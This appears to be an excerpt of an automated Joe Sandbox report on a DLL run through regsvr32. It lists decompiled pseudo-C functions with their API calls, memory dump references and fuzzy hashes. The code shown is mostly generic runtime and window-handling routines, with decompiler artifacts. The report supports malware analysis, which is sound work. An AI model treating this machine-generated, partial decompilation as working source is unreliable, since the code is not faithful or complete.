                                                                                                                				}
                                                                                                                				return _t20;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 10040B07
                                                                                                                • __calloc_crt.LIBCMT ref: 10040B13
                                                                                                                • CreateThread.KERNEL32(?,?,10040A58,00000000,?,10023B90), ref: 10040B57
                                                                                                                • GetLastError.KERNEL32(?,74EC13E0,00000000,?,?,10023B90,?,?,100239FB,?,?,?), ref: 10040B61
                                                                                                                • __dosmaperr.LIBCMT ref: 10040B79
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                  • Part of subcall function 10041BCB: __decode_pointer.LIBCMT ref: 10041BD4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1067611704-0
                                                                                                                • Opcode ID: dcde6ed9a1b6162f08803f4cb18909c519212f31992b996baf2defafd1b9262e
                                                                                                                • Instruction ID: 6863289db019d166419ad51a82ef1f24fda2c8a3403dc53a6c7794798c414783
                                                                                                                • Opcode Fuzzy Hash: dcde6ed9a1b6162f08803f4cb18909c519212f31992b996baf2defafd1b9262e
                                                                                                                • Instruction Fuzzy Hash: 5611C476501205AFDB01EFA4DC8688E77E8EF04368B714539F505E7051D731AD008AAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E100218F9(void* __eflags, struct HWND__* _a4, int _a8, signed int* _a12) {
                                                                                                                				void* __ebx;
                                                                                                                				struct HWND__* _t28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t42;
                                                                                                                
                                                                                                                				_t42 = _a4;
                                                                                                                				E100218BA(_t35, _t42, _a8);
                                                                                                                				E1001D1E6( *((intOrPtr*)(_t42 + 4)), _a8,  &_a4);
                                                                                                                				if( *_t42 != 0) {
                                                                                                                					 *_a12 =  *_a12 | 0xffffffff;
                                                                                                                				}
                                                                                                                				_a8 = 0;
                                                                                                                				L3:
                                                                                                                				L3:
                                                                                                                				if((SendMessageA(_a4, 0x87, 0, 0) & 0x00000040) != 0) {
                                                                                                                					_push(0);
                                                                                                                					if( *_t42 == 0) {
                                                                                                                						SendMessageA(_a4, 0xf1, 0 | _a8 ==  *_a12, ??);
                                                                                                                					} else {
                                                                                                                						if(SendMessageA(_a4, 0xf0, 0, ??) != 0) {
                                                                                                                							 *_a12 = _a8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_a8 = _a8 + 1;
                                                                                                                				}
                                                                                                                				_t28 = GetWindow(_a4, 2);
                                                                                                                				_a4 = _t28;
                                                                                                                				if(_t28 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t28 = GetWindowLongA(_t28, 0xfffffff0);
                                                                                                                				if((_t28 & 0x00020000) == 0) {
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				L11:
                                                                                                                				return _t28;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001D1E6: GetDlgItem.USER32(?,?), ref: 1001D1F3
                                                                                                                • SendMessageA.USER32 ref: 1002193A
                                                                                                                • SendMessageA.USER32 ref: 1002194E
                                                                                                                • SendMessageA.USER32 ref: 10021974
                                                                                                                • GetWindow.USER32(?,00000002), ref: 1002197E
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002198E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 1613074769-0
                                                                                                                • Opcode ID: e2e1e157a924f14629dcaf8b4a3f295fe93a3e35b81a09e34dcd476e42d8d07e
                                                                                                                • Instruction ID: 46d78e2b7352745125e3709bf3bebae527a4c2ce565a9a805d4617d2ddf5d6ac
                                                                                                                • Opcode Fuzzy Hash: e2e1e157a924f14629dcaf8b4a3f295fe93a3e35b81a09e34dcd476e42d8d07e
                                                                                                                • Instruction Fuzzy Hash: FD114F7964021AFFEF019F50DC90EAA7B69EF143A4F508125FD199B2A0CB31DD91DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100271DD(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                                                                				signed short _t24;
                                                                                                                				unsigned int _t34;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t46 = __ecx;
                                                                                                                				if(IsWindow( *(__ecx + 0x20)) == 0) {
                                                                                                                					 *(_t46 + 0xac) = _a4;
                                                                                                                					 *(_t46 + 0xb0) = _a8;
                                                                                                                					 *(_t46 + 0xa4) = _a12;
                                                                                                                					_t24 = _a16;
                                                                                                                					 *(_t46 + 0xa8) = _t24;
                                                                                                                					return _t24;
                                                                                                                				}
                                                                                                                				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                                                                				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                                                                				if( *0x1006d320 >= 0x60000) {
                                                                                                                					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
                                                                                                                					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
                                                                                                                					 *(_t46 + 0xb0) = _t34 >> 0x10;
                                                                                                                				}
                                                                                                                				return InvalidateRect( *(_t46 + 0x20), 0, 1);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateRectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225880595-0
                                                                                                                • Opcode ID: 36d343ef5c7402005a4e3315341ea43abf90203410fab0118e03014d4d576c3f
                                                                                                                • Instruction ID: 0ee4da7db3da10282c4979f1e740b66ff5433e5b017fe0c6a0933576c7f17b31
                                                                                                                • Opcode Fuzzy Hash: 36d343ef5c7402005a4e3315341ea43abf90203410fab0118e03014d4d576c3f
                                                                                                                • Instruction Fuzzy Hash: A0111CB1600718AFF7508F29DC80AB7B7E9FB48755F40452EF999C6160E7B0AC50DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10011780(void* __ecx) {
                                                                                                                				long _v4;
                                                                                                                				long _v8;
                                                                                                                				long _v12;
                                                                                                                				char _v16;
                                                                                                                				void* _t12;
                                                                                                                				void* _t33;
                                                                                                                
                                                                                                                				_t33 = __ecx;
                                                                                                                				E10021B44(_t12);
                                                                                                                				_push(0x65);
                                                                                                                				_t31 = __ecx + 0x70;
                                                                                                                				_v16 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_v4 = 0;
                                                                                                                				E1002631A(__ecx + 0x70, 0,  &_v16, __ecx);
                                                                                                                				E1001D35E(_t31, 5);
                                                                                                                				SendMessageA( *(_t33 + 0x90), 0x1036, 0, 0x100);
                                                                                                                				SendMessageA( *(_t33 + 0x90), 0x1001, 0, 0xc0c0c0);
                                                                                                                				SendMessageA( *(_t33 + 0x90), 0x1026, 0, 0xc0c0c0);
                                                                                                                				SendMessageA( *(_t33 + 0x90), 0x1024, 0, 0xff0000);
                                                                                                                				return SendMessageA( *(_t33 + 0x90), 0x1016, 1, 0);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 187340077-0
                                                                                                                • Opcode ID: 731a49680897c6da82a5d9ad7e48ab59cec6926edf0410b79d4e2cdcb0502602
                                                                                                                • Instruction ID: 7612613c93e32a0060621654432e9fcdfd63722aa98c803f60e1976e18034937
                                                                                                                • Opcode Fuzzy Hash: 731a49680897c6da82a5d9ad7e48ab59cec6926edf0410b79d4e2cdcb0502602
                                                                                                                • Instruction Fuzzy Hash: 50015EB66407047AE320AF758CC1FABE29DEFC8B48F44091DF299A71D1C9F5A9408A65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10024B45(intOrPtr* __ecx, int* _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _t12;
                                                                                                                				int _t14;
                                                                                                                				int _t22;
                                                                                                                				int _t32;
                                                                                                                				int* _t36;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t35 = __ecx;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					_t22 =  *0x10070c88; // 0x60
                                                                                                                					_t12 =  *0x10070c8c; // 0x60
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t32 = GetMapMode( *(__ecx + 8));
                                                                                                                					if(_t32 >= 7 || _t32 == 1) {
                                                                                                                						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                                						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                                						L6:
                                                                                                                						_t36 = _a4;
                                                                                                                						_v8 = _t12;
                                                                                                                						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                                                                						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                                                                						_t36[1] = _t14;
                                                                                                                					} else {
                                                                                                                						_push(3);
                                                                                                                						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                						E1002439D(__ecx, _a4);
                                                                                                                						_push(_t32);
                                                                                                                						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t14;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 10024B55
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 10024B8F
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 10024B98
                                                                                                                  • Part of subcall function 1002439D: MulDiv.KERNEL32 ref: 100243DD
                                                                                                                  • Part of subcall function 1002439D: MulDiv.KERNEL32 ref: 100243FA
                                                                                                                • MulDiv.KERNEL32 ref: 10024BBC
                                                                                                                • MulDiv.KERNEL32 ref: 10024BC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: d0451dc5bda9c491a689ca8ae5625cbd2c431c57943d05e4d6bf0c902c0d6533
                                                                                                                • Instruction ID: 58b8763670d61b3926136e7877b908b05b26f116823db2f1d59ca0f11a90bc59
                                                                                                                • Opcode Fuzzy Hash: d0451dc5bda9c491a689ca8ae5625cbd2c431c57943d05e4d6bf0c902c0d6533
                                                                                                                • Instruction Fuzzy Hash: C711CE35600A14EFDB22EF59DC84D1EBBB9EF88760B124419F98297360DB71ED408F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10024BD3(intOrPtr* __ecx, int* _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _t12;
                                                                                                                				int _t14;
                                                                                                                				int _t30;
                                                                                                                				int _t33;
                                                                                                                				int* _t36;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t35 = __ecx;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					_t30 =  *0x10070c88; // 0x60
                                                                                                                					_t12 =  *0x10070c8c; // 0x60
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t33 = GetMapMode( *(__ecx + 8));
                                                                                                                					if(_t33 >= 7 || _t33 == 1) {
                                                                                                                						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                                						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                                						L6:
                                                                                                                						_t36 = _a4;
                                                                                                                						_v8 = _t12;
                                                                                                                						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                                                                                						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
                                                                                                                						_t36[1] = _t14;
                                                                                                                					} else {
                                                                                                                						_push(3);
                                                                                                                						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                						E10024334(__ecx, _a4);
                                                                                                                						_push(_t33);
                                                                                                                						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t14;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 10024BE3
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 10024C1D
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 10024C26
                                                                                                                  • Part of subcall function 10024334: MulDiv.KERNEL32 ref: 10024374
                                                                                                                  • Part of subcall function 10024334: MulDiv.KERNEL32 ref: 10024391
                                                                                                                • MulDiv.KERNEL32 ref: 10024C4A
                                                                                                                • MulDiv.KERNEL32 ref: 10024C55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: 72c16e21384b73a1fc5a221c524e2a4d17e22dd4fdfbe1e1552dc394a9db06cb
                                                                                                                • Instruction ID: d17de11a873df856b6c2edb0a65fa4880e582bd89fdcc6cc969921f93305dea3
                                                                                                                • Opcode Fuzzy Hash: 72c16e21384b73a1fc5a221c524e2a4d17e22dd4fdfbe1e1552dc394a9db06cb
                                                                                                                • Instruction Fuzzy Hash: 6111CE35601614AFEB21DF19DC84C1EBBB9EF88760B628419F98667360CB71ED419F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1002D750(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v263;
                                                                                                                				char _v264;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t9;
                                                                                                                				struct HWND__* _t21;
                                                                                                                				void* _t22;
                                                                                                                				intOrPtr _t25;
                                                                                                                				void* _t26;
                                                                                                                				int _t27;
                                                                                                                				CHAR* _t28;
                                                                                                                				signed int _t29;
                                                                                                                
                                                                                                                				_t25 = __edx;
                                                                                                                				_t22 = __ecx;
                                                                                                                				_t9 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t9 ^ _t29;
                                                                                                                				_t21 = _a4;
                                                                                                                				_t32 = _t21;
                                                                                                                				_t28 = _a8;
                                                                                                                				if(_t21 == 0) {
                                                                                                                					L1:
                                                                                                                					E1001729E(_t21, _t22, _t26, _t28, _t32);
                                                                                                                				}
                                                                                                                				if(_t28 == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t27 = lstrlenA(_t28);
                                                                                                                				_v264 = 0;
                                                                                                                				E1003BB70(_t27,  &_v263, 0, 0xff);
                                                                                                                				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                                					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                                				}
                                                                                                                				return E1003B437(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?), ref: 1002D77A
                                                                                                                • _memset.LIBCMT ref: 1002D797
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002D7B1
                                                                                                                • lstrcmpA.KERNEL32(00000000,?), ref: 1002D7C3
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 1002D7CF
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4273134663-0
                                                                                                                • Opcode ID: 9c8a90e2d40c88a5552160a9a431cfc347e7c3fe073d578c9596771d5ac53162
                                                                                                                • Instruction ID: 840ce94e709d45d1c2a1a099e559a60107cf57bb5c7396451a43401c7f154f48
                                                                                                                • Opcode Fuzzy Hash: 9c8a90e2d40c88a5552160a9a431cfc347e7c3fe073d578c9596771d5ac53162
                                                                                                                • Instruction Fuzzy Hash: F801F9B6600228AFE701EB64DCC5FDE73ACEF08750F400066F645D7141EA74DD848B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 22%
                                                                                                                			E100284C4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				short _v20;
                                                                                                                				short _v22;
                                                                                                                				char _v24;
                                                                                                                				char _v28;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t12;
                                                                                                                				short _t16;
                                                                                                                				intOrPtr _t22;
                                                                                                                				intOrPtr _t28;
                                                                                                                				intOrPtr _t30;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_t28 = __edx;
                                                                                                                				_t12 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t12 ^ _t31;
                                                                                                                				_t30 = _a8;
                                                                                                                				_t22 = __ecx;
                                                                                                                				 *0x1006efc8();
                                                                                                                				_t29 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_t16 = E1003BB70(0,  &_v24, 0, 0x10);
                                                                                                                				_v24 = 2;
                                                                                                                				if(_t30 != 0) {
                                                                                                                					__imp__#11(_t30);
                                                                                                                					if(_t16 != 0xffffffff) {
                                                                                                                						goto L2;
                                                                                                                					} else {
                                                                                                                						__imp__#112(0x2726);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					__imp__#8(0);
                                                                                                                					L2:
                                                                                                                					_v20 = _t16;
                                                                                                                					__imp__#9(_a4);
                                                                                                                					_v22 = _t16;
                                                                                                                					_t29 = E1002847B( &_v24, _t22,  &_v24, 0x10);
                                                                                                                				}
                                                                                                                				E10015160( &_v28);
                                                                                                                				return E1003B437(_t29, _t22, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 100284EE
                                                                                                                • htonl.WS2_32(00000000), ref: 10028501
                                                                                                                • htons.WS2_32(?), ref: 1002850D
                                                                                                                  • Part of subcall function 1002847B: bind.WS2_32(?,00000002,00000002), ref: 10028486
                                                                                                                • inet_addr.WS2_32(?), ref: 10028529
                                                                                                                • WSASetLastError.WS2_32(00002726), ref: 10028539
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_memsetbindhtonlhtonsinet_addr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3310600910-0
                                                                                                                • Opcode ID: 275b6a40a52886df755adf28c9cdad384373f065aee1e7e136bf502101c8e61d
                                                                                                                • Instruction ID: 5191e71d5d14f494881b45bb81c93006ac3d9af170c3ab7f85a69c119cc3e4c7
                                                                                                                • Opcode Fuzzy Hash: 275b6a40a52886df755adf28c9cdad384373f065aee1e7e136bf502101c8e61d
                                                                                                                • Instruction Fuzzy Hash: B811C835A0021DABDB00EFA4EC858AFB7B9EF88311F500419F501E7291DB749F449761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 27%
                                                                                                                			E10040A4C(void* __ebx, intOrPtr __edx, void* __edi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                                				intOrPtr* _v0;
                                                                                                                				DWORD* _v8;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* __esi;
                                                                                                                				void* _t30;
                                                                                                                				void* _t36;
                                                                                                                				DWORD* _t41;
                                                                                                                				intOrPtr* _t43;
                                                                                                                				void* _t45;
                                                                                                                				void* _t51;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t64;
                                                                                                                				intOrPtr _t65;
                                                                                                                				intOrPtr* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t64 = __edi;
                                                                                                                				_t61 = __edx;
                                                                                                                				_t51 = __ebx;
                                                                                                                				E10040E0D(_v28);
                                                                                                                				asm("int3");
                                                                                                                				_push(_t67);
                                                                                                                				E1004296C();
                                                                                                                				_t30 = E10042951(E10042966());
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t54 = _v0;
                                                                                                                					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
                                                                                                                					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
                                                                                                                					_t61 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                					_push(_t54);
                                                                                                                					 *((intOrPtr*)(_t30 + 4)) =  *((intOrPtr*)(_t54 + 4));
                                                                                                                					E10042B3B(__ebx, __edi, _t67, __eflags);
                                                                                                                				} else {
                                                                                                                					_t67 = _v0;
                                                                                                                					if(E10042996(E10042966(), _t67) == 0) {
                                                                                                                						ExitThread(GetLastError());
                                                                                                                					}
                                                                                                                					 *_t67 = GetCurrentThreadId();
                                                                                                                				}
                                                                                                                				_t78 =  *0x1005dfe4;
                                                                                                                				if( *0x1005dfe4 != 0) {
                                                                                                                					_t45 = E10047552(_t51, _t64, _t67, _t78);
                                                                                                                					_t79 = _t45;
                                                                                                                					_t54 = 0x1005dfe4;
                                                                                                                					if(_t45 != 0) {
                                                                                                                						 *0x1005dfe4();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E10040A17(_t61, _t64, _t67, _t79);
                                                                                                                				asm("int3");
                                                                                                                				_push(_t54);
                                                                                                                				_push(_t51);
                                                                                                                				_push(_t64);
                                                                                                                				_t65 = _v0;
                                                                                                                				_t80 = _t65;
                                                                                                                				_v20 = 0;
                                                                                                                				if(_t65 != 0) {
                                                                                                                					_push(_t67);
                                                                                                                					E1004296C();
                                                                                                                					_t68 = E10046749(1, 0x214);
                                                                                                                					__eflags = _t68;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L16:
                                                                                                                						_push(_t68);
                                                                                                                						E1003B59D(0, _t65, _t68, __eflags);
                                                                                                                						__eflags = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							E1003D4A4(_v8);
                                                                                                                						}
                                                                                                                						_t36 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_push( *((intOrPtr*)(E10042B23(_t61, _t65, __eflags) + 0x6c)));
                                                                                                                						_push(_t68);
                                                                                                                						E100429EC(0, _t65, _t68, __eflags);
                                                                                                                						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t68 + 0x58)) = _a16;
                                                                                                                						_t41 = _a24;
                                                                                                                						__eflags = _t41;
                                                                                                                						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
                                                                                                                						if(_t41 == 0) {
                                                                                                                							_t41 =  &_a12;
                                                                                                                						}
                                                                                                                						_t36 = CreateThread(_a4, _a8, 0x10040a58, _t68, _a20, _t41);
                                                                                                                						__eflags = _t36;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_v8 = GetLastError();
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t43 = E1003D47E(_t80);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					 *_t43 = 0x16;
                                                                                                                					E10041BCB(0, _t61, _t65);
                                                                                                                					_t36 = 0;
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}




















                                                                                                                APIs
